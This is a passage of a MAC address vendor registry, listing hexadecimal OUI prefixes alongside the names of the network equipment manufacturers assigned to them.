Ltd. 000FA4 Sprecher Automation GmbH 000FA6 S2 Security Corporation 000FAA Nexus Technologies 000FA8 Photometrics, Inc. 000FBD MRV Communications (Networks) LTD 000FB4 Timespace Technology 000F9D DisplayLink (UK) Ltd 000FC5 KeyMed Ltd 000FBF DGT Sp. z o.o. 000F92 Microhard Systems Inc. 000FCB 3Com Ltd 000FD5 Schwechat - RISE 000F67 West Instruments 000F6E BBox 000F6F FTA Communication Technologies 000F63 Obzerv Technologies 000F21 Scientific Atlanta, Inc 000F11 Prodrive B.V. 000F13 Nisca corporation 000F14 Mindray Co., Ltd. 000F65 icube Corp. 000F5D Genexis BV 000F58 Adder Technology Limited 000F12 Panasonic Europe Ltd. 000F0E WaveSplitter Technologies, Inc. 000F0C SYNCHRONIC ENGINEERING 000F0B Kentima Technologies AB 000F46 SINAR AG 000F41 Zipher Ltd 000F4D TalkSwitch 000F71 Sanmei Electronics Co.,Ltd 000F6B GateWare Communications GmbH 000ED5 COPAN Systems Inc. 000ECA WTSS Inc 000ECC Tableau, LLC 000ECB VineSys Technology 000ED2 Filtronic plc 000EC8 Zoran Corporation 000ED9 Aksys, Ltd. 000EB4 GUANGZHOU GAOKE COMMUNICATIONS TECHNOLOGY CO.LTD. 000EB1 Newcotech,Ltd 000EA9 Shanghai Xun Shi Communications Equipment Ltd. Co. 000EB6 Riverbed Technology, Inc. 000EB7 Knovative, Inc. 000EFA Optoway Technology Incorporation 000EFD FUJINON CORPORATION 000EF5 iPAC Technology Co., Ltd. 000EFB Macey Enterprises 000F09 Private 000EDC Tellion INC. 000ECD SKOV A/S 000EDB XiNCOM Corp. 000EDD SHURE INCORPORATED 000EC2 Lowrance Electronics, Inc. 000EA3 CNCR-IT CO.,LTD,HangZhou P.R.CHINA 000EA2 McAfee, Inc 000E9B Ambit Microsystems Corporation 000E78 Amtelco 000E71 Gemstar Technology Development Ltd. 000E70 in2 Networks 000E37 Harms & Wende GmbH & Co.KG 000E31 Olympus Soft Imaging Solutions GmbH 000E2F Roche Diagnostics GmbH 000E2A Private 000E9E Topfield Co., Ltd 000E41 NIHON MECHATRONICS CO.,LTD. 000E3C Transact Technologies Inc 000E63 Lemke Diagnostics GmbH 000E5B ParkerVision - Direct2Data 000E60 360SUN Digital Broadband Corporation 000E54 AlphaCell Wireless Ltd. 000E4E Waveplus Technology Co., Ltd. 000E4A Changchun Huayu WEBPAD Co.,LTD 000E93 Milénio 3 Sistemas Electrónicos, Lda. 000E8D Systems in Progress Holding GmbH 000E76 GEMSOC INNOVISION INC. 000E7D Electronics Line 3000 Ltd. 000E2C Netcodec co. 000E23 Incipient, Inc. 000E25 Hannae Technology Co., Ltd 000E20 ACCESS Systems Americas, Inc. 000E21 MTU Friedrichshafen GmbH 000DD4 Symantec Corporation 000DD2 Simrad Optronics ASA 000DD1 Stryker Corporation 000DD7 Bright 000DD9 Anton Paar GmbH 000DDC VAC 000DE0 ICPDAS Co.,LTD 000DE3 AT Sweden AB 000DEA Kingtel Telecommunication Corp. 000DED Cisco Systems, Inc 000DE4 DIGINICS, Inc. 000E09 Shenzhen Coship Software Co.,LTD. 000E05 WIRELESS MATRIX CORP. 000E22 Private 000E1C Hach Company 000E02 Advantech AMT Inc. 000DC9 THALES Elektronik Systeme GmbH 000D81 Pepperl+Fuchs GmbH 000D7A DiGATTO Asia Pacific Pte Ltd 000D77 FalconStor Software 000D76 Hokuto Denshi Co,. Ltd. 000D7B Consensys Computers Inc. 000D8F King Tsushin Kogyo Co., LTD. 000D89 Bils Technology Inc 000D86 Huber + Suhner AG 000DC8 AirMagnet, Inc 000DBE Bel Fuse Europe Ltd.,UK 000DBC Cisco Systems, Inc 000D9F RF Micro Devices 000DA5 Fabric7 Systems, Inc 000DC5 EchoStar Global B.V. 000D99 Orbital Sciences Corp.; Launch Systems Group 000D6C M-Audio 000D70 Datamax Corporation 000D59 Amity Systems, Inc. 000D4E NDR Co.,LTD. 000D50 Galazar Networks 000D17 Turbo Networks Co.Ltd 000D18 Mega-Trend Electronics CO., LTD. 000D20 ASAHIKASEI TECHNOSYSTEM CO.,LTD. 000D49 Triton Systems of Delaware, Inc. 000D48 AEWIN Technologies Co., Ltd. 000D24 SENTEC E&E CO., LTD. 000D22 Unitronics LTD 000D14 Vtech Innovation LP dba Advanced American Telephones 000D5B Smart Empire Investments Limited 000D3A Microsoft Corp. 000D30 IceFyre Semiconductor 000D31 Compellent Technologies, Inc. 000D2C Net2Edge Limited 000D25 SANDEN CORPORATION 000D6F Ember Corporation 000D5E NEC Personal Products 000D3F VTI Instruments Corporation 000CE3 Option International N.V. 000CE7 MediaTek Inc. 000CE8 GuangZhou AnJuBao Co., Ltd 000CE4 NeuroCom International, Inc. 000CB5 Premier Technolgies, Inc 000CB6 NANJING SEU MOBILE & INTERNET TECHNOLOGY CO.,LTD 000CC3 BeWAN systems 000CB4 AutoCell Laboratories, Inc. 000CB1 Salland Engineering (Europe) BV 000CBC Iscutum 000D04 Foxboro Eckardt Development GmbH 000D08 AboveCable, Inc. 000D05 cybernet manufacturing inc. 000CFE Grand Electronic Co., Ltd 000D0E Inqnet Systems, Inc. 000D11 DENTSPLY - Gendex 000CC8 Xytronix Research & Design, Inc. 000CCA HGST a Western Digital Company 000CD0 Symetrix 000CD9 Itcare Co., Ltd 000CD5 Passave Inc. 000CD2 Schaffner EMV AG 000A07 WebWayOne Ltd 000CB0 Star Semiconductor Corporation 000C34 Vixen Co., Ltd. 000C58 M&S Systems 000C51 Scientific Technologies Inc. 000C73 TELSON ELECTRONICS CO., LTD 000C65 Sunin Telecom 000C6C Eve Systems GmbH 000C6F Amtek system co.,LTD. 000C7E Tellium Incorporated 000C87 AMD 000C98 LETEK Communications Inc. 000C8E Mentor Engineering Inc 000CA2 Harmonic Video Network 000CA4 Prompttec Product Management GmbH 000C5B HANWANG TECHNOLOGY CO.,LTD 000C60 ACM Systems 000C83 Logical Solutions 000C96 OQO, Inc. 000C08 HUMEX Technologies Corp. 000C0D Communications & Power Industries / Satcom Division 000C04 Tecnova 000C01 Abatron AG 000C39 Sentinel Wireless Inc. 000C33 Compucase Enterprise Co. Ltd. 000C36 SHARP TAKAYA ELECTRONICS INDUSTRY CO.,LTD. 000BF6 Nitgen Co., Ltd 000BFD Cisco Systems, Inc 000BFA EXEMYS SRL 000BF4 Private 000BFB D-NET International Corporation 000C1D Mettler & Fuchs AG 000C1E Global Cache 000C1A Quest Technical Solutions Inc. 000C24 ANATOR 000C19 Telio Communications GmbH 000C13 MediaQ 000C06 Nixvue SystemsPte Ltd 000C2D FullWave Technology Co., Ltd. 000C26 Weintek Labs. Inc. 000C2B ELIAS Technology, Inc. 000BF0 MoTEX Products Co., Ltd. 000BF1 LAP Laser Applikations 000BEE inc.jet, Incorporated 000B8D Avvio Networks 000B85 Cisco Systems, Inc 000B7F Align Engineering LLC 000BA6 Miyakawa Electric Works Ltd. 000B93 Ritter Elektronik 000B9B Sirius System Co, Ltd. 000BE2 Lumenera Corporation 000BE1 Nokia NET Product Operations 000BA8 HANBACK ELECTRONICS CO., LTD. 000BA9 CloudShield Technologies, Inc. 000BA1 Fujikura Solutions Ltd. 000B8E Ascent Corporation 000B8F AKITA ELECTRONICS SYSTEMS CO.,LTD. 000BCB Fagor Automation , S. Coop 000BC8 AirFlow Networks 000BCE Free2move AB 000BCF AGFA NDT INC. 000BC3 Multiplex, Inc. 000BBE Cisco Systems, Inc 000BE0 SercoNet Ltd. 000BBD Connexionz Limited 000B40 Cambridge Industries Group (CIG) 000B44 Concord IDea Corp. 000B42 commax Co., Ltd. 000B47 Advanced Energy 000B81 Kaparel Corporation 000B82 Grandstream Networks, Inc. 000B6E Neff Instrument Corp. 000B72 Lawo AG 000B31 Yantai ZhiYang Scientific and technology industry CO., LTD 000B2F bplan GmbH 000B3D CONTAL OK Ltd. 000B4E VertexRSI, General Dynamics SatCOM Technologies, Inc. 000B4D Emuzed 000B24 AirLogic 000B78 TAIFATECH INC. 000B6C Sychip Inc. 0091D6 Crystal Group, Inc. 000B5A HyperEdge 000B0F Bosch Rexroth 000B0C Agile Systems Inc. 000B0A dBm Optics 000B09 Ifoundry Systems Singapore 000B1D LayerZero Power Systems, Inc. 000B19 Vernier Networks, Inc. 000B16 Communication Machinery Corporation 000B12 NURI Telecom Co., Ltd. 000AC5 Color Kinetics 000ABD Rupprecht & Patashnick Co. 000ACB XPAK MSA Group 000AD5 Brainchild Electronic Co., Ltd. 000AD6 BeamReach Networks 000AFE NovaPal Ltd 000AFD Kentec Electronics 000AEF OTRUM ASA 000AE5 ScottCare Corporation 000AB0 LOYTEC electronics GmbH 000AB5 Digital Electronic Network 000AD2 JEPICO Corporation 000A98 M+F Gwinner GmbH & Co 000A9B TB Group Inc 000A6C Walchem Corporation 000A5F almedio inc. 000A6B Tadiran Telecom Business Systems LTD 000A61 Cellinx Systems Inc. 000A78 OLITEC 000AA9 Brooks Automation GmbH 000AA5 MAXLINK INDUSTRIES LIMITED 000AA2 SYSTEK INC. 000A5B Power-One as 000A55 MARKEM Corporation 000A73 Scientific Atlanta 000A69 SUNNY bell Technology Co., Ltd. 000A84 Rainsun Enterprise Co., Ltd. 000A7E The Advantage Group 000A4C Molecular Devices Corporation 000A4D Noritz Corporation 000A91 HemoCue AB 0009F2 Cohu, Inc., Electronics Division 0009E9 Cisco Systems, Inc 0009DC Galaxis Technology AG 000A3A J-THREE INTERNATIONAL Holding Co., Ltd. 000A47 Allied Vision Technologies 000A3C Enerpoint Ltd. 000A44 Avery Dennison Deutschland GmbH 0009F8 UNIMO TECHNOLOGY CO., LTD. 0009FF X.net 2000 GmbH 000A03 ENDESA SERVICIOS, S.L. 0009FE Daisy Technologies, Inc. 000A28 Motorola 000A29 Pan Dacom Networking AG 0009EB HuMANDATA LTD. 0009E8 Cisco Systems, Inc 0009ED CipherOptics 000A40 Crown Audio -- Harmanm International 000A26 CEIA S.p.A. 000A1D Optical Communications Products Inc. 000A16 Lassen Research 000A18 Vichel Inc. 000A06 Teledex LLC 0009A9 Ikanos Communications 00099F VIDEX INC. 0009A2 Interface Co., Ltd. 0009A1 Telewise Communications, Inc. 00097D SecWell Networks Oy 000976 Datasoft ISDN Systems GmbH 0009C6 Visionics Corporation 0009D1 SERANOA NETWORKS INC 0009CE SpaceBridge Semiconductor Corp. 0009B8 Entise Systems 0009AF e-generis 0009AD HYUNDAI SYSCOMM, INC. 0009BD Epygi Technologies, Ltd. 0009C2 Onity, Inc. 0009C3 NETAS 0009B5 3J Tech. Co., Ltd. 000982 Loewe Opta GmbH 000983 GlobalTop Technology, Inc. 0009DD Mavin Technology Inc. 00097A Louis Design Labs. 00096B IBM Corp 00096D Powernet Technologies Corp. 000964 Hi-Techniques, Inc. 000965 HyunJu Computer Co., Ltd. 000939 ShibaSoku Co.,Ltd. 000933 Ophit Co.Ltd. 000932 Omnilux 00091C CacheVision, Inc 00091A Macat Optics & Electronics Co., Ltd. 00091B Digital Generation Inc. 000929 Sanyo Industries (UK) Limited 000928 Telecore 00092E B&Tech System Inc. 00096F Beijing Zhongqing Elegant Tech. Corp.,Limited 00095E Masstech Group Inc. 00094F elmegt GmbH & Co. KG 000943 Cisco Systems, Inc 000902 Redline Communications Inc. 0008FA KEB Automation KG 000959 Sitecsoft 000957 Supercaller, Inc. 0008D2 ZOOM Networks Inc. 0008C5 Liontech Co., Ltd. 0008AC Eltromat GmbH 0008AA KARAM 0008AB EnerLinx.com, Inc. 0008AD Toyo-Linx Co., Ltd. 0008F2 C&S Technology 0008EA Motion Control Engineering, Inc 0008ED ST&T Instrument Corp. 000888 OULLIM Information Technology Inc,. 000885 EMS Dr. Thomas Wünsche 000872 Sorenson Communications 00089A Alcatel Microelectronics 0008A1 CNet Technology Inc. 000893 LE INFORMATION COMMUNICATION INC. 0008B0 BKtel communications GmbH 0008CA TwinHan Technology Co.,Ltd 0008B6 RouteFree, Inc. 0008D8 Dowkey Microwave 0008DF Alistel Inc. 0008DB Corrigent Systems 00087C Cisco Systems, Inc 000879 CEM Corporation 00087D Cisco Systems, Inc 000875 Acorp Electronics Corp. 000816 Bluelon ApS 000811 VOIX Corporation 000806 Raonet Systems, Inc. 00086F Resources Computer Network Ltd. 000867 Uptime Devices 0007F8 ITDevices, Inc. 0007F3 Thinkengine Networks 00081C @pos.com 00081E Repeatit AB 000856 Gamatronic Electronic Industries Ltd. 000853 Schleicher GmbH & Co. Relaiswerke KG 000826 Colorado Med Tech 00085E PCO AG 00079A Verint Systems Inc 000774 GuangZhou Thinker Technology Co. Ltd. 000798 Selea SRL 000791 International Data Communications, Inc. 0007EE telco Informationssysteme GmbH 0007E2 Bitworks, Inc. 0007E6 edgeflow Canada Inc. 0007E5 Coup Corporation 0007DE eCopilt AB 0007C8 Brain21, Inc. 0007C5 Gcom, Inc. 0007C1 Overture Networks, Inc. 0007A7 A-Z Inc. 0007A6 Leviton Manufacturing Co., Inc. 0007A3 Ositis Software, Inc. 0007C2 Netsys Telecom 00078F Emkay Innovative Products 000782 Oracle Corporation 0007AE Britestream Networks, Inc. 0007B1 Equator Technologies 0005F9 TOA Corporation 0007CA Creatix Polymedia Ges Fur Kommunikaitonssysteme 0007DF Vbrick Systems Inc. 000744 Unico, Inc. 000749 CENiX Inc. 00073D Nanjing Postel Telecommunications Co., Ltd. 000739 Scotty Group Austria Gmbh 00074E IPFRONT Inc 000752 Rhythm Watch Co., Ltd. 00074F Cisco Systems, Inc 000743 Chelsio Communications 000747 Mecalc 000779 Sungil Telecom Co., Ltd. 00077E Elrest GmbH 000778 GERSTEL GmbH & Co. KG 00076D Flexlight Networks 000730 Hutchison OPTEL Telecom Technology Co., Ltd. 000722 The Nielsen Company 000760 TOMIS Information & Telecom Corp. 000735 Flarion Technologies, Inc. 00075E Ametek Power Instruments 00071F European Systems Integration 000721 Formac Elektronik GmbH 000786 Wireless Networks Inc. 0006BC Macrolink, Inc. 0006C2 Smartmatic Corporation 000654 Winpresa Building Automation Technologies GmbH 0006B4 Vorne Industries, Inc. 0006AE Himachal Futuristic Communications Ltd 0006E5 Fujian Newland Computer Ltd. Co. 0006DE Flash Technology 0006DF AIDONIC Corporation 0006DD AT & T Laboratories - Cambridge Ltd 0006F0 Digeo, Inc. 000700 Zettamedia Korea 0006C5 INNOVI Technologies Limited 0006C6 lesswire AG 0006B7 TELEM GmbH 0006EF Maxxan Systems, Inc. 0006E9 Intime Corp. 0006EA ELZET80 Mikrocomputer GmbH&Co. KG 000708 Bitrage Inc. 000712 JAL Information Technology 000713 IP One, Inc. 000707 Interalia Inc. 0006F2 Platys Communications 0006FA IP SQUARE Co, Ltd. 000703 CSEE Transport 000706 Sanritz Corporation 0006D1 Tahoe Networks, Inc. 0006D4 Interactive Objects, Inc. 0006CA American Computer & Digital Components, Inc. (ACDC) 0006CE DATENO 00068E HID Corporation 00068A NeuronNet Co. Ltd. R&D Center 000685 NetNearU Corporation 000650 Tiburon Networks, Inc. 00065E Photuris, Inc. 00067F Digeo, Inc. 000683 Bravara Communications, Inc. 000655 Yipee, Inc. 000676 Novra Technologies Inc. 000664 Fostex Corporation 00067A JMP Systems 000673 TKH Security Solutions USA 00069B AVT Audio Video Technologies GmbH 000693 Flexus Computer Technology, Inc. 00065D Heidelberg Web Systems 0006B0 Comtech EF Data Corp. 000696 Advent Networks 0005D7 Vista Imaging, Inc. 0005DB PSI Nentec GmbH 0005DD Cisco Systems, Inc 000628 Cisco Systems, Inc 00061D MIP Telecom, Inc. 000619 Connection Technology Systems 000640 White Rock Networks 000644 NextGen Business Solutions, Inc 000645 Meisei Electric Co. Ltd. A06A00 Verilink Corporation 0005F8 Real Time Access, Inc. 0005EB Blue Ridge Networks, Inc. 0005E8 TurboWave, Inc. 0005F6 Young Chang Co. Ltd. 0005FC Schenck Pegasus Corp. 00063A Dura Micro, Inc. 000632 Mesco Engineering GmbH 000634 GTE Airfone Inc. 00060C Melco Industries, Inc. 00060E IGYS Systems, Inc. 000614 Prism Holdings 000608 At-Sky SAS 0005C3 Pacific Instruments, Inc. 0005B9 Airvana, Inc. 0005BC Resource Data Management Ltd 0005BE Kongsberg Seatex AS 0005BD ROAX BV 0005C1 A-Kyung Motion, Inc. 0005B4 Aceex Corporation 000598 CRONOS S.r.l. 0005B7 Arbor Technology Corp. 00059B Cisco Systems, Inc 00057E Eckelmann Steuerungstechnik GmbH 000580 FibroLAN Ltd. 000582 ClearCube Technology 0005D9 Techno Valley, Inc. 0005DC Cisco Systems, Inc 0005D0 Solinet Systems 00059F Yotta Networks, Inc. 000587 Locus, Incorporated 000590 Swissvoice Ltd. 000595 Alesis Corporation 000578 Private 000572 Deonet Co., Ltd. 000576 NSM Technology Ltd. 00056A Heuft Systemtechnik GmbH 000568 Piltofish Networks AB 0005B6 INSYS Microelectronics GmbH 000555 Japan Cash Machine Co., Ltd. 000552 Xycotec Computer GmbH 00054A Ario Data Networks, Inc. 000548 Disco Corporation 0004F7 Omega Band, Inc. 0004EE Lincoln Electric Company 0004F0 International Computers, Ltd 000527 SJ Tek Co. Ltd 000529 Shanghai Broadan Communication Technology Co., Ltd 00052C Supreme Magic Corporation 00053E KID Systeme GmbH 00053F VisionTek, Inc. 00053D Agere Systems 000500 Cisco Systems, Inc 000519 Siemens Building Technologies AG, 00050D Midstream Technologies, Inc. 000534 Northstar Engineering Ltd. 000535 Chip PC Ltd. 000507 Fine Appliance Corp. 0004FD Japan Control Engineering Co., Ltd. 000562 Digital View Limited 0004E5 Glonet Systems, Inc. 0004D2 Adcon Telemetry GmbH 0004D3 Toyokeiki Co., Ltd. 0004AA Jetstream Communications 0004A0 Verity Instruments, Inc. 00049E Wirelink Co., Ltd. 00049A Cisco Systems, Inc 000479 Radius Co., Ltd. 0004B0 ELESIGN Co., Ltd. 0004AB Mavenir Inc. 0004A7 FabiaTech Corporation 000498 Mahi Networks 000497 MacroSystem Digital Video AG 0004D5 Hitachi Information & Communication Engineering, Ltd. 0004CA FreeMs Corp. 000488 Eurotherm Controls 000485 PicoLight 0004DA Relax Technology, Inc. 0004C5 ASE Technologies, USA 000436 ELANsat Technologies, Inc. 000432 Voyetra Turtle Beach, Inc. 000435 InfiNet LLC 000437 Powin Information Technology, Inc. 00040C Kanno Works, Ltd. 000408 Sanko Electronics Co., Ltd. 000407 Topcon Positioning Systems, Inc. 000409 Cratos Networks 000455 ANTARA.net 000457 Universal Access Technology, Inc. 00044D Cisco Systems, Inc 000454 Quadriga UK 000448 Polaroid Corporation 000447 Acrowave Systems Co., Ltd. 00043E Telencomm 00046D Cisco Systems, Inc 000466 ARMITEL Co. 0003E2 Comspace Corporation 0003FF Microsoft Corporation 000414 Umezawa Musen Denki Co., Ltd. 000428 Cisco Systems, Inc 000386 Ho Net, Inc. 00037D Stellcom 000383 Metera Networks, Inc. 0003CC Momentum Computer, Inc. 0003D7 NextNet Wireless, Inc. 0003D3 Internet Energy Systems, Inc. 0003CD Clovertech, Inc. 00038B PLUS-ONE I&T, Inc. 00038C Total Impact 0003EE MKNet Corporation 0003EA Mega System Technologies, Inc. 0003E6 Entone, Inc. 0003A9 AXCENT Media AG 00039F Cisco Systems, Inc 000390 Digital Video Communications, Inc. 0003B5 Entra Technology Co. 000364 Scenix Semiconductor, Inc. 00035E Metropolitan Area Networks, Inc. 00035C Saint Song Corp. 00035D Bosung Hi-Net Co., Ltd. 000379 Proscend Communications, Inc. 00036F Telsey SPA 000372 ULAN 000334 Newport Electronics 00033A Silicon Wave, Inc. 000332 Cisco Systems, Inc 00030E Core Communications Co., Ltd. 000312 TRsystems GmbH 000341 Axon Digital Design 008037 Ericsson Group 00033D ILSHin Lab 000366 ASM Pacific Technology 000362 Vodtel Communications, Inc. 00034D Chiaro Networks, Ltd. 000322 IDIS Co., Ltd. 00031D Taiwan Commate Computer, Inc. 000326 Iwasaki Information Systems Co., Ltd. 000290 Woorigisool, Inc. 000292 Logic Innovations, Inc. 000286 Occam Networks 0002D2 Workstation AG 0002CD TeleDream, Inc. 0002D0 Comdial Corporation 0002CC M.C.C.I 0002B0 Hokubu Communication & Industrial Co., Ltd. 0002AA PLcom Co., Ltd. 0002B5 Avnet, Inc. 0002B4 DAPHNE 0002AC 3PAR data 0002D9 Reliable Controls 0002EF CCC Network Systems Group Ltd. 0002E8 E.D.&A. 0002F2 eDevice, Inc. 00029D Merix Corp. 0002C5 Evertz Microsystems Ltd. 00024A Cisco Systems, Inc 000249 Aviv Infocom Co, Ltd. 000245 Lampus Co, Ltd. 000232 Avision, Inc. 000235 Paragon Networks International 000237 Cosmo Research Corp. 000228 Necsom, Ltd. 000246 All-Win Tech Co., Ltd. 00023A ZSK Stickmaschinen GmbH 00027F ask-technologies.com 00027E Cisco Systems, Inc 001095 Thomson Inc. 00025D Calix Networks 00027B Amplify Net, Inc. 000273 Coriolis Networks 000257 Microcom Corp. 000253 Televideo, Inc. 00026F Senao International Co., Ltd. 000230 Intersoft Electronics 00021C Network Elements, Inc. 00020C Metro-Optix 000216 Cisco Systems, Inc 000214 DTVRO 00020F AATR 0001C3 Acromag, Inc. 0001C2 ARK Research Corp. 0001EA Cirilium Corp. 0001E0 Fast Systems, Inc. 0001AC Sitara Networks, Inc. 0001ED SETA Corp. 0001F6 Association of Musical Electronics Industry 0001CB EVR 0001D6 manroland AG 0001AD Coach Master Internationald.b.a. CMI Worldwide, Inc. 000188 LXCO Technologies ag 00019B Kyoto Microcomputer Co., Ltd. 00017F Experience Music Project 00015A Digital Video Broadcasting 00012A Telematica Sistems Inteligente 000166 TC GROUP A/S 000176 Orient Silver Enterprises 000158 Electro Industries/Gauge Tech 00012D Komodo Technology 000148 X-traWeb Inc. 000187 I2SE GmbH 000180 AOpen, Inc. 000197 Cisco Systems, Inc 00019A LEUNIG GmbH 000159 S1 Corporation 000171 Allied Data Technologies 0030AC Systeme Lauer GmbH & Co., Ltd. 0030FB AZS Technology AG 0030AE Times N System, Inc. 003003 Phasys Ltd. 0030E2 GARNET SYSTEMS CO., LTD. 00013A SHELCAD COMMUNICATIONS, LTD. 000140 Sendtek Corporation 000123 Schneider Electric Japan Holdings Ltd. 000125 YAESU MUSEN CO., LTD. 000126 PAC Labs 00011B Unizone Technologies, Inc. 00011D Centillium Communications 00011F RC Networks, Inc. 00B080 Mannesmann Ipulsys B.V. 00B01E Rantic Labs, Inc. 00B0F0 CALY NETWORKS 00B09A Morrow Technologies Corp. 00302E Hoft & Wessel AG 0030ED Expert Magnetics Corp. 00300F IMT - Information Management T 003082 TAIHAN ELECTRIC WIRE CO., LTD. 0030A9 Netiverse, Inc. 0030FE DSA GmbH 0030C4 Canon Imaging Systems Inc. 00304D ESI 081443 UNIBRAIN S.A. 00B009 Grass Valley, A Belden Brand 00B0AC SIAE-Microelettronica S.p.A. 003023 COGENT COMPUTER SYSTEMS, INC. 003090 CYRA TECHNOLOGIES, INC. 0030A7 SCHWEITZER ENGINEERING 00307C ADID SA 003055 Renesas Technology America, Inc. 00302F GE Aviation System 00300E Klotz Digital AG 0030D5 DResearch GmbH 003018 Jetway Information Co., Ltd. 00309F AMBER NETWORKS 0030A8 OL'E COMMUNICATIONS, INC. 0030D1 INOVA CORPORATION 0030BB CacheFlow, Inc. 0030AF Honeywell GmbH 0030AA AXUS MICROSYSTEMS, INC. 003089 Spectrapoint Wireless, LLC 00309A ASTRO TERRA CORP. 003087 VEGA GRIESHABER KG 003062 IP Video Networks Inc 00302D QUANTUM BRIDGE COMMUNICATIONS 0030CB OMNI FLOW COMPUTERS, INC. 00306B CMOS SYSTEMS, INC. 0030AD SHANGHAI COMMUNICATION 0030CF TWO TECHNOLOGIES, INC. 0030B2 L-3 Sonoma EO 003035 Corning Incorporated 00307F IRLAN LTD. 00D015 UNIVEX MICROTECHNOLOGY CORP. 00D048 ECTON, INC. 00D0A5 AMERICAN ARIUM 00305D DIGITRA SYSTEMS, INC. 003036 RMP ELEKTRONIKSYSTEME GMBH 00D0CF MORETON BAY 00D07F STRATEGY & TECHNOLOGY, LIMITED 0030E6 Draeger Medical Systems, Inc. 0030BD BELKIN COMPONENTS 003007 OPTI, INC. 00D0C2 BALTHAZAR TECHNOLOGY AB 00D022 INCREDIBLE TECHNOLOGIES, INC. 00D071 ECHELON CORP. 00D04F BITRONICS, INC. 00D069 TECHNOLOGIC SYSTEMS 00D090 Cisco Systems, Inc 00D0F5 ORANGE MICRO, INC. 00D0E9 Advantage Century Telecommunication Corp. 00D094 Seeion Control LLC 00D0FB TEK MICROSYSTEMS, INCORPORATED 00D066 WINTRISS ENGINEERING CORP. 00D082 IOWAVE INC. 00D081 RTD Embedded Technologies, Inc. 00D002 DITECH CORPORATION 00D085 OTIS ELEVATOR COMPANY 00D011 PRISM VIDEO, INC. 00D0DF KUZUMI ELECTRONICS, INC. 00D09B SPECTEL LTD. 00D067 CAMPIO COMMUNICATIONS 00D058 Cisco Systems, Inc 00D032 YANO ELECTRIC CO., LTD. 00D0F1 SEGA ENTERPRISES, LTD. 00D03A ZONEWORX, INC. 00D001 VST TECHNOLOGIES, INC. 00503E Cisco Systems, Inc 005020 MEDIASTAR CO., LTD. 00D075 ALARIS MEDICAL SYSTEMS, INC. 00D04C EUROTEL TELECOM LTD. 00D0E1 AVIONITEK ISRAEL INC. 00D008 MACTELL CORPORATION 00D0D9 DEDICATED MICROCOMPUTERS 00D00B RHK TECHNOLOGY, INC. 00D09C KAPADIA COMMUNICATIONS 00D0F3 SOLARI DI UDINE SPA 00D039 UTILICOM, INC. 00D0A0 MIPS DENMARK 00D00A LANACCESS TELECOM S.A. 00D01C SBS TECHNOLOGIES, 00D0D5 GRUNDIG AG 00D041 AMIGO TECHNOLOGY CO., LTD. 00D09D VERIS INDUSTRIES 00D06D ACRISON, INC. 00D02B JETCELL, INC. 00D062 DIGIGRAM 00D08D PHOENIX GROUP, INC. 00D03D GALILEO TECHNOLOGY, LTD. 0050C6 LOOP TELECOMMUNICATION INTERNATIONAL, INC. 00509F HORIZON COMPUTER 0050A5 CAPITOL BUSINESS SYSTEMS, LTD. 005000 NEXO COMMUNICATIONS, INC. 005090 DCTRI 00503B MEDIAFIRE CORPORATION 005046 MENICX INTERNATIONAL CO., LTD. 005041 Coretronic Corporation 0050B0 TECHNOLOGY ATLANTA CORPORATION 0050DD SERRA SOLDADURA, S.A. 005063 OY COMSEL SYSTEM AB 00508D ABIT COMPUTER CORPORATION 0050A0 DELTA COMPUTER SYSTEMS, INC. 005066 AtecoM GmbH advanced telecomunication modules 005059 iBAHN 0050D9 ENGETRON-ENGENHARIA ELETRONICA IND. e COM. LTDA 005001 YAMASHITA SYSTEMS CORP. 005067 AEROCOMM, INC. 0050B6 GOOD WAY IND. CO., LTD. 00504B BARCONET N.V. 0050EA XEL COMMUNICATIONS, INC. 0050C8 Addonics Technologies, Inc. 0050C4 IMD 005089 SAFETY MANAGEMENT SYSTEMS 0050F4 SIGMATEK GMBH & CO. KG 005021 EIS INTERNATIONAL, INC. 00505E DIGITEK MICROLOGIC S.A. 0050E8 NOMADIX INC. 0050AE FDK Co., Ltd 0050E7 PARADISE INNOVATIONS (ASIA) 0050FB VSK ELECTRONICS 009073 GAIO TECHNOLOGY 00907B E-TECH, INC. 009081 ALOHA NETWORKS, INC. 00901C mps Software Gmbh 005086 TELKOM SA, LTD. 00501A IQinVision 00508F ASITA TECHNOLOGIES INT'L LTD. 005015 BRIGHT STAR ENGINEERING 005057 BROADBAND ACCESS SYSTEMS 005088 AMANO CORPORATION 005031 AEROFLEX LABORATORIES, INC. 0090DB NEXT LEVEL COMMUNICATIONS 009056 TELESTREAM, INC. 009068 DVT CORP. 00905E RAULAND-BORG CORPORATION 0090AF J. MORITA MFG. CORP. 005003 Xrite Inc 0050D3 DIGITAL AUDIO PROCESSING PTY. LTD. 0050AD CommUnique Wireless Corp. 0050AF INTERGON, INC. 009034 IMAGIC, INC. 0090AA INDIGO ACTIVE VISION SYSTEMS LIMITED 00905B RAYMOND AND LAE ENGINEERING 0090BC TELEMANN CO., LTD. 00900A PROTON ELECTRONIC INDUSTRIAL CO., LTD. 0090F8 MEDIATRIX TELECOM 009010 SIMULATION LABORATORIES, INC. 0090C6 OPTIM SYSTEMS, INC. 00902E NAMCO LIMITED 009037 ACUCOMM, INC. 009078 MER TELEMANAGEMENT SOLUTIONS, LTD. 0090B8 ROHDE & SCHWARZ GMBH & CO. KG 00901A UNISPHERE SOLUTIONS 0090B5 NIKON CORPORATION 009005 PROTECH SYSTEMS CO., LTD. 009059 TELECOM DEVICE K.K. 0090CA ACCORD VIDEO TELECOMMUNICATIONS, LTD. 0090E9 JANZ COMPUTER AG 0090EB SENTRY TELECOM SYSTEMS 0090FE ELECOM CO., LTD.(LANEED DIV.) 0090BB TAINET COMMUNICATION SYSTEM Corp. 009090 I-BUS 0090D5 EUPHONIX, INC. 00904A CONCUR SYSTEM TECHNOLOGIES 00908F AUDIO CODES LTD. 00909E Critical IO, LLC 001092 NETCORE INC. 00101C OHM TECHNOLOGIES INTL, LLC 001046 ALCORN MCBRIDE INC. 001028 COMPUTER TECHNICA, INC. 0010B7 COYOTE TECHNOLOGIES, LLC 0090E5 TEKNEMA, INC. 0090F4 LIGHTNING INSTRUMENTATION 009074 ARGON NETWORKS, INC. 00909F DIGI-DATA CORPORATION 00903B TriEMS Research Lab, Inc. 0010C9 MITSUBISHI ELECTRONICS LOGISTIC SUPPORT CO. 000400 LEXMARK INTERNATIONAL, INC. 0010C5 PROTOCOL TECHNOLOGIES, INC. 00101A PictureTel Corp. 001047 ECHO ELETRIC CO. LTD. 00903F AZTEC RADIOMEDIA 001043 A2 CORPORATION 0010A5 OXFORD INSTRUMENTS 0010D7 ARGOSY RESEARCH INC. 00102C Lasat Networks A/S 0010FD COCOM A/S 